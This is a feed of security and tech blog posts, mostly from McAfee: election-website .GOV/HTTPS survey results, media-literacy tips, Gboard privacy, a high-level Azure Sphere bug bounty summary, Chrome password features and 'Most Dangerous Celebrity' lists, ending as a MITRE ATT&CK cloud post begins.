South Dakota 66 2 3.0% 14 21.2% 1 1.5%
Tennessee 95 23 24.2% 38 40.0% 12 12.6%
Texas 254 10 3.9% 86 33.9% 6 2.4%
Utah 29 8 27.6% 16 55.2% 7 24.1%
Vermont 14 0 0.0% 0 0.0% 0 0.0%
Virginia 95 33 34.7% 61 64.2% 35 36.8%
Washington 39 7 17.9% 26 66.7% 6 15.4%
West Virginia 55 18 32.7% 33 60.0% 16 29.1%
Wisconsin 72 16 22.2% 61 84.7% 11 15.3%
Wyoming 23 4 17.4% 15 65.2% 2 8.7%
Total 3089 611 19.8% 1710 55.4% 507 16.4%

We found that the battleground states were largely in a bad position when it came to .GOV and HTTPS.

Only 29% of election websites used both .GOV and HTTPS in North Carolina, 22% in Georgia, 15.3% in Wisconsin, 10.8% in Michigan, 10.4% in Pennsylvania, and 2.4% in Texas.

While 95.5% of Florida’s county election websites and webpages use HTTPS encryption, only 6% percent validate their authenticity with .GOV.

During the January 2020 survey, only 11 Iowa counties protected their election administration pages and domains with .GOV validation and HTTPS encryption. By September 2020, that number rose to 25 as 14 counties added .GOV validation. But 72.7% of the state’s county election sites and pages still lack official U.S. government validation of their authenticity.

Alternatively, Ohio led the survey pool with 87.5% of election webpages and domains validated by .GOV and protected by HTTPS encryption. Four of Five (80%) Hawaii counties protect their main county and election webpages with both .GOV validation and encryption and 73.3% of Arizona county election websites do the same.

What’s not working

Separate Election Sites. As many as 166 counties set up websites that were completely separate from their main county web domain.  Separate election sites may have easy-to-remember, user-friendly domain names to make them more accessible for the broadest possible audience of citizens. Examples include my own county’s www.votedenton.com as well as www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com.

The problem with these election-specific domains is that while 89.1% of these sites have HTTPS, 92.2% lack .GOV validation to guarantee that they belong to the county governments they claim. Furthermore, only 7.2% of these domains have both .GOV and HTTPS implemented. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.

Not on OUR website. Some smaller counties with few resources often reason that they can inform and protect voters simply by linking from their county websites to their states’ official election sites. Other smaller counties have suggested that social media platforms such as Facebook are preferable to election websites to reach Internet-savvy voters.

Unfortunately, neither of these approaches prevents malicious actors from spoofing their county government web properties. Such actors could still set up fake websites regardless of whether the genuine websites link to a .GOV validated state election website or whether counties set up amazing Facebook election pages.

For that matter, Facebook is not a government entity focused on validating that organizational or group pages are owned by the entities they claim to be. The platform could just as easily be used by malicious parties to create fake pages spreading disinformation about where and how to vote during elections.

It’s not OUR job. McAfee found that some states’ voters could be susceptible to fake county election websites even though their counties have little if any role at all in administering elections. States such as Connecticut, Delaware, Maine, Massachusetts, New Hampshire, Rhode Island and Vermont administer their elections through their local governments, meaning that any election information is only available at the states’ websites and those websites belonging to major cities and towns. While this arrangement makes county-level website comparisons with other states difficult for the purpose of our survey, it doesn’t make voters in these states any less susceptible to fake versions of their county website.

There should be one recipe for the security and integrity of government websites such as election websites and that recipe should be .GOV and HTTPS.

What IS working: The Carrot & The Stick

Ohio’s leadership position in our survey appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. Ohio’s Secretary of State used “the stick” approach by demanding by official order that counties implement .GOV and HTTPS on their election web properties. If counties couldn’t move their existing websites to .GOV, he offered “the carrot” of allowing them to leverage the state’s domain.

A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain.

Examples:

https://adamscountyoh.gov/elections.asp
https://www.allen.boe.ohio.gov/
https://boe.ashland.oh.gov/
https://www.boe.ohio.gov/ashtabula
https://elections.bcohio.gov/
https://www.carrollcountyohioelections.gov/
https://boe.clermontcountyohio.gov/
https://crawfordcountyohioboe.gov/
https://vote.delawarecountyohio.gov/
https://votehamiltoncountyohio.gov/

While Ohio’s main county websites still largely lack .GOV validation, Ohio does provide a mechanism for voters to quickly assess if the main election website is real or potentially fake. Other states should consider such interim strategies until all county and local websites with election functions can be fully transitioned to .GOV.

Ultimately, the end goal success should be that we are able to tell voters that if they don’t see .GOV and HTTPS, they shouldn’t believe that a website is legitimate or safe. What we tell voters must be that simple, because the general public lacks a technical background to determine real sites from fake sites.

For more information on our .GOV-HTTPS county website research, potential disinformation campaigns, other threats to our elections, and voter safety tips, please visit our Elections 2020 page: https://www.mcafee.com/enterprise/en-us/2020-elections.html

The post US County Election Websites (Still) Fail to Fulfill Basic Security Measures appeared first on McAfee Blogs.

Spot Fake News and Misinformation in Your Social Media Feed

fake news

Spot Fake News and Misinformation in Your Social Media Feed

Where do you get your news? There’s a good chance much of it comes from social media.

In 2019, Pew Research found that 55% of American adults said they get their news from social media either “often” or “sometimes,” which is an 8% rise over the previous year. We can visualize what that mix might look like. Some of their news on social media may come from information sources they’ve subscribed to and yet more news may appear via articles reposted or retweeted by friends.

So, as we scroll through our feeds and quickly find ourselves awash in a cascade of news and comments on the news, we also find ourselves wondering: what’s true and false here?

And that’s the right question to ask. With the advent of the internet, anyone can become a publisher. That’s one of the internet’s greatest strengths—we can all have a voice. Publishing is no longer limited to newspaper, TV, and radio ownership bodies. Yet it’s one of the internet’s greatest challenges as well—with millions of publishers out there, not everyone is posting the truth. And sometimes, people aren’t doing the posting at all.

For example, last May, researchers at Carnegie Melon University studied more than 200 million tweets about the current virus. Of the top 50 most influential retweeters, 82% of them were bots. Some 62% of the top 1,000 retweeters were bots as well. What were they retweeting? Researchers said the tweets revolved around more than 100 types of inaccurate stories that included unfounded conspiracy theories and phony cures. Researchers cited two reasons for this surge: “First, more individuals have time on their hands to create do-it-yourself bots. But the number of sophisticated groups that hire firms to run bot accounts also has increased.”

With the sheer volume of news and information we wade through each day, you can be assured that degrees of false and misleading information make their way into people’s social media mix. And that calls for all of us to build up our media literacy—which is our ability to critically analyze the media we consume for bias and accuracy.

What follows are a few basics of media literacy that can help you to discern what’s fact and what’s fiction as you scroll through your social media feed for news.

The difference between misinformation and disinformation

When talking about spotting truth from falsehood on social media, it helps to first define two types of falsehood: unintentional and the deliberate.

First off, there’s unintentional misinformation. We’re only human, and sometimes that means we get things wrong. We forget details, recall things incorrectly, or we pass along unverified accounts that we mistakenly take for fact. Thus, misinformation is wrong information that you don’t know is wrong. An innocent everyday example of this is when someone on your neighborhood Facebook group posts that the drug store closes at 8pm on weeknights when in fact it really closes at 7pm. They believe it closes at 8pm, but they’re simply mistaken.

That differs entirely from deliberate disinformation. This is intentionally misleading information or facts that have been manipulated to create a false narrative—typically with an ulterior motive in mind. The readiest example of this is propaganda, yet other examples also extend to deliberate untruths engineered to discredit a person, group, or institution. In other words, disinformation can take forms both large and small. It can apply to a person just as easily as it can to a major news story.

Now, let’s take a look at some habits and tactics designed to help you get a better grasp on the truth in your social media feed.

Consider the source

Some of the oldest advice is the best advice, and that holds true here: consider the source. Take time to examine the information you come across. Look at its source. Does that source have a track record of honesty and dealing plainly with the facts? Likewise, that source has sources too. Consider them in the same way as well.

Now, what’s the best way to go about that? For one, social media platforms are starting to embed information about publications into posts where their content is shared. For example, if a friend shares an article from The Economist, Facebook now includes a small link in the form of an “i” in a circle. Clicking on this presents information about the publication, which can give you a quick overview of its ownership, when it was founded, and so forth.

Another fact-finding trick comes by way of Michael Caufield, the Director of Blended and Networked Learning at Washington State University. He calls it: “Just Add Wikipedia.” It entails doing a search for a Wikipedia page by using the URL of an information source. For example, if you saw an article published on Vox.com, you’d simply search “Wikipedia www.vox.com.” The Wikipedia entry will give you an overview of the information source, its track record, its ownership, and if it has fired reporters or staff for false reporting. Of course, be aware that Wikipedia entries are written by public editors and contributors. These articles will only be as accurate as the source material that they are drawn from, so be sure to reference the footnotes that are cited in the entry. Reading those will let you know if the entry is informed by facts from reputable sources as well. They may open up other avenues of fact-finding as well!

Expand your media diet

A single information source or story won’t provide a complete picture. It may only cover a topic from a certain angle or narrow focus. Likewise, information sources are helmed by editors and stories are written by people—all of which have their biases, whether overt or subtle. It’s for this reason that expanding your media diet to include a broader range information sources is so important.

So, see what other information sources have to say on the same topic. Consuming news across a spectrum will expose you to thoughts and coverage you might not otherwise get if you keep your consumption to a handful of sources. The result is that you’re more broadly informed and have the ability to compare and contrast different sources and points of view. Using the tips above, you can find other reputable sources to round out your media diet.

Additionally, for a list of reputable information sources, along with the reasons why they’re reputable, check out “10 Journalism Brands Where You Find Real Facts Rather Than Alternative Facts” published by Forbes and authored by an associate professor at The King’s College in New York City. It certainly isn’t the end all, be all of lists, yet it should provide you with a good starting point.

Let your emotions be your guide

Has a news story you’ve read or watched ever made you shake your fist at the screen or want to clap and cheer? How about something that made you fearful or simply laugh? Bits of content that evoke strong emotional responses tend to spread quickly, whether they’re articles, a post, or even a tweet. That’s a ready sign that a quick fact check could be in order.

There’s a good reason for that. Bad actors who wish to foment unrest, unease, or simply spread disinformation use emotionally driven content to plant a seed. Whether or not their original story gets picked up and viewed firsthand doesn’t matter to these bad actors. Their aim is to actually get some manner of disinformation out into the ecosystem. They rely on others who will re-post, re-tweet, or otherwise pass it along on their behalf—to the point where the original source of the information is completely lost. This is one instance where people readily begin to accept certain information as fact, even if it’s not factual at all.

Certainly, some legitimate articles will generate a response as well, yet it’s a good habit to do a quick fact check and confirm what you’ve read. This leads us right back to our earlier points about considering the source and cross-checking against other sources of information as well.

Keep an eye out for “sponsored content”

You’ve probably seen headlines similar to this before: THIS FAT-BURNING TRICK HAS DOCTORS BAFFLED! You’ll usually spot them in big blocks laden with catchy photos and illustrations, almost to the point that they look like they’re links to other news stories. They’re not. They’re ads, which often strike a sensationalistic tone.

The next time you spot one of these, look around the area of the web page where they’re placed. You should find a little graphic or snippet of text that says “Advertisement,” “Paid Sponsor,” or something similar. And there you go. You spotted some sponsored content. These so-called articles aren’t intentionally developed to misinform you. They are likely trying to bait you into buying something.

However, in some less reputable corners of the web ads like these can take you to malicious sites that install malware or expose you to other threats. Always surf with web browser protection. Good browser protection will either identify such links as malicious right away or prevent your browser from proceeding to the malicious site if you click on such a link.

Be helpful, not right

So, let’s say you’ve been following these practices of media literacy for a while. What do you do when you see a friend posting what appears to be misinformation on their social media account? If you’re inclined to step in and comment, try to be helpful, not right.

We can only imagine how many spoiled relationships and “unfriendings” have occurred thanks to moments where one person comments on a post with the best intentions of “setting the record straight,” only to see tempers flare. We’ve all seen it happen. The original poster, instead of being open to the new information, digs in their heels and becomes that much more convinced of being right on the topic.

One way to keep your friendships and good feelings intact is this: instead of entering the conversation with the intention of being “right,” help people discover the facts for themselves. You can present your information as part of a discussion on the topic. So while you shouldn’t expect this to act like a magic wand that whisks away misinformation, what you can do is provide a path toward a reputable source of information that the original poster, and their friends, can follow if they wish.

Be safe out there

Wherever your online travels take you as you read and research the news, be sure to go out there with a complete security suite. In addition to providing virus protection, it will also help protect your identity and privacy as you do anything online. Also look for an option that will protect your mobile devices too, as we spend plenty of time scrolling through our social media feeds on our smartphones.

If you’re interested in learning more about savvy media consumption, pop open a tab and give these articles a read—they’ll give you a great start:

Bots in the Twittersphere: Pew Research
How to Spot Fake News: FactCheck.org

Likewise, keep an eye on your own habits. We forward news in our social media feeds too—so follow these same good habits when you feel like it’s time to post. Make sure that what you share is truthful too.

Be safe, be well-read, and be helpful!

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Spot Fake News and Misinformation in Your Social Media Feed appeared first on McAfee Blogs.

Privacy-Preserving Smart Input with Gboard

Google Keyboard (a.k.a Gboard) has a critical mission to provide frictionless input on Android to empower users to communicate accurately and express themselves effortlessly. In order to accomplish this mission, Gboard must also protect users' private and sensitive data. Nothing users type is sent to Google servers. We recently launched privacy-preserving input by further advancing the latest federated technologies. In Android 11, Gboard also launched the contextual input suggestion experience by integrating on-device smarts into the user's daily communication in a privacy-preserving way.

Before Android 11, input suggestions were surfaced to users in several different places. In Android 11, Gboard launched a consistent and coordinated approach to access contextual input suggestions. For the first time, we've brought Smart Replies to the keyboard suggestions - powered by system intelligence running entirely on device. The smart input suggestions are rendered with a transparent layer on top of Gboard’s suggestion strip. This structure maintains the trust boundaries between the Android platform and Gboard, meaning sensitive personal content cannot be not accessed by Gboard. The suggestions are only sent to the app after the user taps to accept them.

For instance, when a user receives the message “Have a virtual coffee at 5pm?” in Whatsapp, on-device system intelligence predicts smart text and emoji replies “Sounds great!” and “👍”. Android system intelligence can see the incoming message but Gboard cannot. In Android 11, these Smart Replies are rendered by the Android platform on Gboard’s suggestion strip as a transparent layer. The suggested reply is generated by the system intelligence. When the user taps the suggestion, Android platform sends it to the input field directly. If the user doesn't tap the suggestion, gBoard and the app cannot see it. In this way, Android and Gboard surface the best of Google smarts whilst keeping users' data private: none of their data goes to any app, including the keyboard, unless they've tapped a suggestion.

Additionally, federated learning has enabled Gboard to train intelligent input models across many devices while keeping everything individual users type on their device. Today, the emoji is as common as punctuation - and have become the way for our users to express themselves in messaging. Our users want a way to have fresh and diversified emojis to better express their thoughts in messaging apps. Recently, we launched new on-device transformer models that are fine-tuned with federated learning in Gboard, to produce more contextual emoji predictions for English, Spanish and Portuguese.

Furthermore, following the success of privacy-preserving machine learning techniques, Gboard continues to leverage federated analytics to understand how Gboard is used from decentralized data. What we've learned from privacy-preserving analysis has let us make better decisions in our product.

When a user shares an emoji in a conversation, their phone keeps an ongoing count of which emojis are used. Later, when the phone is idle, plugged in, and connected to WiFi, Google’s federated analytics server invites the device to join a “round” of federated analytics data computation with hundreds of other participating phones. Every device involved in one round will compute the emoji share frequency, encrypt the result and send it a federated analytics server. Although the server can’t decrypt the data individually, the final tally of total emoji counts can be decrypted when combining encrypted data across devices. The aggregated data shows that the most popular emoji is 😂 in Whatsapp, 😭 in Roblox(gaming), and ✔ in Google Docs. Emoji 😷 moved up from 119th to 42nd in terms of frequency during COVID-19.

Gboard always has a strong commitment to Google’s Privacy Principles. Gboard strives to build privacy-preserving effortless input products for users to freely express their thoughts in 900+ languages while safeguarding user data. We will keep pushing the state of the art in smart input technologies on Android while safeguarding user data. Stay tuned!

Celebrating multi-national cultures this Hispanic Heritage Month

Do you know the difference between Hispanic and Latino? What about the traditions that are important parts of the Hispanic culture? Or beloved Spanish or Portuguese phrases that don’t come across in English?

McAfee’s team spans 45 countries, making us a team rich in cultural diversity. We are always learning more about each other and celebrate Latin culture year-round. To commemorate Hispanic Heritage Month, which runs from September 15 – October 15, we’ve asked members of our McAfee Latino Community for their unique perspective on what being Latino means to them and to share more of the distinctive elements of their country of origin and traditions.

Check out some of the wonderful responses we received:

What Being Latino Means to Me:

Favorite Things About Being Latino:

We couldn’t be more proud to celebrate Hispanic Heritage Month by elevating the voices of our team members and celebrating the diverse backgrounds and cultures that make up McAfee.

Simply put, a welcoming work culture where every team member feels accepted and celebrated is part of our DNA. We value all voices which make up McAfee and appreciate how they further enrich our culture.

Interested in joining a company that supports inclusion and belonging? Search our jobs. Subscribe to job alerts. 

 

The post Celebrating multi-national cultures this Hispanic Heritage Month appeared first on McAfee Blogs.

Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program

From June to August, part of the McAfee Advanced Threat Research (ATR) team participated in Microsoft’s Azure Sphere Research Challenge.  Our research resulted in reporting multiple vulnerabilities classified by Microsoft as “important” or “critical” in the platform that, to date, have qualified for over $160,000 USD in bounty awards scheduled to be contributed to the ACLU ($100,000), St. Jude’s Children’s Research Hospital ($50,000) and PDX Hackerspace (approximately $20,000). With these contributions, we hope to support and give back both to our local hacker community that has really stepped up to help during the COVID crisis, and also recognize, at a larger scale, the importance to protect and further civil liberties and the wellbeing of those most in need.  

This blog post is a highlevel overview of the program, why we choose to take part in it, and a brief description of our findings. A detailed technical walkthrough of our findings can be found here 

Additionally, Microsoft has released two summary blogs detailing the Azure Sphere Bounty Program as a whole, including McAfee’s efforts and findings. They can be found here:

MSRC Blog

Azure Sphere Core Team Blog

What is Azure Sphere and the Azure Sphere Research Challenge? 

In late May Microsoft started a new bug bounty program for its Azure Sphere platform. Azure Sphere is a hardened IoT device with a secure communication link to the cloud that has been in development for the last few years and reached general availability in early 2020. Microsoft designed and built it from scratch to ensure every aspect of it is as secure as possibleper their security model. To put the theory to test, Microsoft invited a few select partners and hackers to try their best to defeat its security measures.  

The Azure sphere team came up with multiple scenarios that would test the security model of the device and qualify for an increased payout from the regular Azure Bug Bounty program. These scenarios range from the ability to bypascertain security measures, to executing code in the hardware enabled secure core of the device.  

Research scenarios specific to the Azure Sphere Research Challenge 

Why did ATR get involved with the program? 

There are multiple reasons why we were keen to participate in this program. First, as security researchers, the Azure Sphere platform is an exciting new research target that has been built from the ground up with security in mind. It showcases what might become of the IoT space in the next few years as legacy platforms are slowly phased out. Being at the forefront of what is being done in the IoT space ensures our research remains current and we are ready to tackle future new challenges. Second, by finding critical bugs in this new platform we help make it more secure and offer our support to make the IoT space increasingly resistant to cyber threats. Finally, as this is a bug bounty program, we decided from the start that we would donate any award we received to charity, thus using our skills to contribute to the social good of our local communities and support causes that transcend the technology sector.   

Findings 

We’ve reported multiple bugs to Microsoft as a result of our research that were rated Important or Critical: 

  • Important – Security Feature bypass ($3,300): The inclusion of symlink in application package allows for referencing files outside of the application package mount point. 
  • Critical – RCE ($48,000): The inclusion of character device in an application package allows for direct interaction with a part of the flash memory, eventually leading to the modification of critical system files and further exploitation. 
  • Important – EoP ($11,000): Multiple bugs in how uid_map files are processed, allowing for elevation of privilege to the sys user.  
  • Important – Eop ($11,000): A user with sys privileges can trick Application Manager into unmounting “azcore” and mount a rogue binary in its stead. Triggering a core dump of a running process will then execute the rogue binary with full capabilities & root privileges due to improper handling of permissions in the LSM. 
  • Critical – EoP ($48,000): Further problems in the privilege dropping of azcore leads to the complete bypass of Azure Sphere capability restrictions 
  • Critical – EoP ($48,000): Due to improper certificate management, it is possible to re-claim a device on the Azure Sphere pre-prod server and obtain a valid capability file that works in the prod environment. This capability file can be used to re-enable application development mode on a finalized device (claimed by a third party). The deployment of the capability file requires physical access to a device.  

Conclusion 

This research was an exciting opportunity to look at new platform with very little prior research, while still being in the familiar territory of an ARM device running a hardened Linux operating-system 

Through the bugs we found we were able to get a full chain exploit from a locked device to having root access. However, the Azure Sphere platform has many more security features such as remote attestation, and a hardware enabled secure core that is still holding strong.  

Finally, we want to thank Microsoft for the opportunity of participating in this exciting program, and the bounty awards 

The post Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program appeared first on McAfee Blogs.

New Password Protections (and more!) in Chrome

Passwords are often the first line of defense for our digital lives. Today, we’re improving password security on both Android and iOS devices by telling you if the passwords you’ve asked Chrome to remember have been compromised, and if so, how to fix them.

To check whether you have any compromised passwords, Chrome sends a copy of your usernames and passwords to Google using a special form of encryption. This lets Google check them against lists of credentials known to be compromised, but Google cannot derive your username or password from this encrypted copy.

We notify you when you have compromised passwords on websites, but it can be time-consuming to go find the relevant form to change your password. To help, we’re adding support for ".well-known/change-password" URLs that let Chrome take users directly to the right “change password” form after they’ve been alerted that their password has been compromised.

Along with these improvements, Chrome is also bringing Safety Check to mobile. In our next release, we will launch Safety Check on iOS and Android, which includes checking for compromised passwords, telling you if Safe Browsing is enabled, and whether the version of Chrome you are running is updated with the latest security protections. You will also be able to use Chrome on iOS to autofill saved login details into other apps or browsers.

In Chrome 86 we’ll also be launching a number of additional features to improve user security, including:

Enhanced Safe Browsing for Android

Earlier this year, we launched Enhanced Safe Browsing for desktop, which gives Chrome users the option of more advanced security protections.

When you turn on Enhanced Safe Browsing, Chrome can proactively protect you against phishing, malware, and other dangerous sites by sharing real-time data with Google’s Safe Browsing service. Among our users who have enabled checking websites and downloads in real time, our predictive phishing protections see a roughly 20% drop in users typing their passwords into phishing sites.

Improvements to password filling on iOS

We recently launched Touch-to-fill for passwords on Android to prevent phishing attacks. To improve security on iOS too, we’re introducing a biometric authentication step before autofilling passwords. On iOS, you’ll now be able to authenticate using Face ID, Touch ID, or your phone passcode. Additionally, Chrome Password Manager allows you to autofill saved passwords into iOS apps or browsers if you enable Chrome autofill in Settings.


Mixed form warnings and download blocking

Update (10/07/2020): Mixed form warnings were originally scheduled for Chrome 86, but will be delayed until Chrome 87

Secure HTTPS pages may sometimes still have non-secure features. Earlier this year, Chrome began securing and blocking what’s known as “mixed content”, when secure pages incorporate insecure content. But there are still other ways that HTTPS pages can create security risks for users, such as offering downloads over non-secure links, or using forms that don’t submit data securely.

To better protect users from these threats, Chrome 86 is introducing mixed form warnings on desktop and Android to alert and warn users before submitting a non-secure form that’s embedded in an HTTPS page.

Additionally, Chrome 86 will block or warn on some insecure downloads initiated by secure pages. Currently, this change affects commonly abused file types, but eventually secure pages will only be able to initiate secure downloads of any type. For more details, see Chrome’s plan to gradually block mixed downloads altogether

We encourage developers to update their forms and downloads to use secure connections for the safety and privacy of their users.

Cristiano Ronaldo tops McAfee India’s Most Dangerous Celebrity 2020 List

Most Dangerous Celebrity

Cristiano Ronaldo tops McAfee India’s Most Dangerous Celebrity 2020 List

During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyber threats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information. Owing to his international popularity and fan following that well resonates in India, Cristiano Ronaldo takes the top spot on the India edition of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

Ronaldo is popular not only for his football skills, but also for his lifestyle, brand endorsements, yearly earnings, and large social media following, with fans devotedly tracking his every movement. This year, Ronaldo’s transfer to Juventus from Real Madrid for a reported £105M created quite a buzz, grabbing attention from football enthusiasts worldwide. Within the Top 10 list, Ronaldo is closely followed by veteran actress Tabu (No. 2) and leading Bollywood actresses, Taapsee Pannu, (No. 3) Anushka Sharma at (No. 4) and Sonakshi Sinha (No. 5). Also making the top ten is Indian singer Armaan Malik (No. 6), and young and bubbly actor Sara Ali Khan (No. 7). Rounding out the rest of the top ten are Indian actress Kangana Ranaut (No. 8), followed by popular TV soap actress Divyanka Tripathi (No. 9) and lastly, the King of Bollywood, Shah Rukh Khan (No. 10).

 

Most Dangerous Celebrity

Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for new shows, sports, and movies to watch. For example, Ronaldo is strongly associated with malicious search terms, as fans are constantly seeking news on his personal life, as well as searching for news on his latest deals with football clubs. In addition, users may be streaming live football matches through illegal streaming platforms to avoid subscription fees. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity related news, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

 Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

Use parental control software

Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

 Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Cristiano Ronaldo tops McAfee India’s Most Dangerous Celebrity 2020 List appeared first on McAfee Blogs.

How Searching For Your Favourite Celebrity May Not End Well

Most Dangerous Celebrity

How Searching For Your Favourite Celebrity May Not End Well

2020 has certainly been the year for online entertainment. With many Aussies staying home to stay well, the internet and all its offerings have provided the perfect way for us all to pass time. From free movies and TV shows to the latest celebrity news, many of us have devoured digital content to entertain ourselves. But our love affair with online entertainment certainly hasn’t gone unnoticed by cybercriminals who have ‘pivoted’ in response and cleverly adapted their scams to adjust to our insatiable desire for content.

Searching For Our Favourite Celebrities Can Be A Risky Business

Cybercriminals are fully aware that we love searching for online entertainment and celebrity news and so devise their plans accordingly. Many create fake websites that promise users free content from a celebrity of the moment to lure unsuspecting Aussies in. But these malicious websites are purpose-built to trick consumers into sharing their personal information in exchange for the promised free content – and this is where many come unstuck!

Who Are The Most Dangerous Celebrities of 2020?

McAfee, the world’s leading cybersecurity company, has researched which famous names generate the riskiest search results that could potentially trigger consumers to unknowingly install malware on their devices or unwillingly share their private information with cybercriminals.

And in 2020, English singer-songwriter Adele takes out the top honours as her name generates the most harmful links online. Adele is best known for smashing the music charts since 2008 with hit songs including ‘Rolling in the Deep’ and ‘Someone Like You’. In addition to her award-winning music, Adele is also loved for her funny and relatable personality, as seen on her talk show appearances (such as her viral ‘Carpool Karaoke’ segment) and concert footage. Most recently, her weight-loss and fitness journey have received mass media attention, with many trying to get to the bottom of her ‘weight-loss’ secrets.

Trailing Adele as the second most dangerous celebrity is actress and star of the 2020 hit show Stan ‘Love Life’ Anna Kendrick, followed by rapper Drake (no. 3), model and actress Cara Delevingne (no. 4), US TikTok star Charli D’Amelio (no. 5) and singer-songwriter Alicia Keys (no. 6). Rounding out the top ten are ‘Sk8r Boi’ singer Avril Lavigne (No. 7), New Zealand rising music star, Benee (no. 8), songstress Camila Cabello (no. 9), and global superstar, singer and actress Beyonce (no. 10).

Most Dangerous Celebrity

Aussies Love Celebrity Gossip

Whether it was boredom or the fact that we just love a stickybeak, our love of celebrity news reached new heights this year with our many of us ‘needing’ to stay up to date with the latest gossip from our favourite public figures. Adele’s weight-loss journey (no.1), Drake’s first photos of ‘secret son’ Adonis (no. 4), and Cara Delevingne’s breakup with US actress Ashley Benson (no. 5), all had us Aussie fans flocking to the internet to search for the latest developments on these celebrity stories.

We’ve Loved New Releases in 2020

With many of us burning through catalogues of available movies and TV shows amid advice to stay at home, new release titles have definitely been the hottest ticket in town to stay entertained.

Rising to fame following her roles in ‘Twilight’ and musical comedy ‘Pitch Perfect’, Anna Kendrick (no. 2) starred in HBO Max series ‘Love Life’ which was released during the peak of COVID-19 in Australia, as well as the 2020 children’s film ‘Trolls World Tour’. R&B and pop megastar Beyonce (no. 10) starred in the 2019 remake of Disney cult classic ‘The Lion King’ and released a visual album ‘Black Is King’ in 2020.

Music Has Soothed Our Souls This Year 

While live concerts and festivals came to a halt earlier this year, many of us are still seeking music – both old and new – to help us navigate these unprecedented times. In fact, musicians make up 50% of the top 10 most dangerous celebrities – hailing from all genres, backgrounds and generations.

Canadian rapper Drake (No. 2) sparked fan interest by dropping his ‘Dark Lanes Demo Tapes’ album including hit songs ‘Chicago Freestyle’ and ‘Tootsie Slide’ that went massively viral on TikTok. New Zealand singer Benee also came out of the woodwork with viral sensations Supalonely and Glitter topping charts and reaching global popularity on TikTok.

Known for her enormously successful R&B/Soul music in the early 2000s, Alicia Keys (no. 6) released a string of new singles in 2020. Camila Cabello’s ‘Senorita’ duet with Canadian singer and now boyfriend Shawn Mendes, was Spotify’s most streamed song of 2019. The couple continued to attract copious attention as fans followed stories reporting on the lovebirds self-isolating together in Miami earlier this year.

How to Avoid Getting Caught In An Online Celebrity Scam

Please don’t feel that getting caught by an ill-intentioned cybercrime is inevitable. If you follow these few simple tips, you can absolutely continue your love of online entertainment and all things celebrity:

  1. Be Careful What You Click

If you are looking for new release music, movies or TV shows or even an update on your favourite celebrity then ALWAYS be cautious and only click on links to reliable sources. Avoid ‘dodgy’ looking websites that promise free content – I guarantee these sites will gift you a big dose of malware. The safest thing is to wait for official releases, use only legitimate streaming sites and visit reputable news sites.

  1. Say NO to Illegal Streaming and Downloading Suspicious Files

Yes, illegal downloads are free but they are usually riddled with malware or adware disguised as mp3 files. Be safe and use only legitimate music streaming platforms – even if it costs a few bucks! Imagine how devastating it would be to lose access to everything on your computer thanks to a nasty piece of malware?

  1. Protect Your Online Safety With A CyberSecurity Solution

One of the best ways of safeguarding yourself (and your family) from cybercriminals is by investing in an  comprehensive cybersecurity solution like McAfee’s Total Protection. This Rolls Royce cybersecurity package will protect you from malware, spyware, ransomware and phishing attacks. An absolute no brainer!

  1. Get Parental Controls Working For You

Kids love celebrities too! Parental control software allows you to introduce limits to your kids’ viewing which will help minimise their exposure to potentially malicious or inappropriate websites when they are searching for the latest new on TikTok star Charlie D’Amelio or go to download the latest Benee track.

I don’t know how my family of 6 would have survived this year without online entertainment. We’ve devoured the content from three different streaming services, listened to a record number of hours on Spotify and filled our heads with news courtesy of online news sites. And while things are looking up, it will be a while before life returns to normal. So, please take a little time to educate your family on the importance of ‘thinking before you click’ and the perils of illegal downloading. Let’s not make 2020 any more complicated!!

Stay safe everyone!

 

Alex x

The post How Searching For Your Favourite Celebrity May Not End Well appeared first on McAfee Blogs.

MITRE ATT&CK for Cloud: Adoption and Value Study by UC Berkeley CLTC

Are you prepared to detect and defend against attacks that target your data in cloud services, or apps you’ve built that are hosted in the cloud? 

Background 

Nearly all enterprises and public sector customers we work with have enabled cloud use in their organization, with many seeing a 600%+ increase1 in use in the March-April timeframe of 2020, when the shift to remote work rapidly took shape. 

